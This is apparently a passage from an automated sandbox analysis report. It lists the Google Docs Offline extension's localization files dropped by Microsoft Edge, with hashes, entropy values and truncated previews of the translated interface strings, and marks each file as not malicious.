                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):858
                                                                                                                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):899
                                                                                                                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1895
                                                                                                                                                                                                                                                                Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                                                                                                                Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                                                                                                                Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

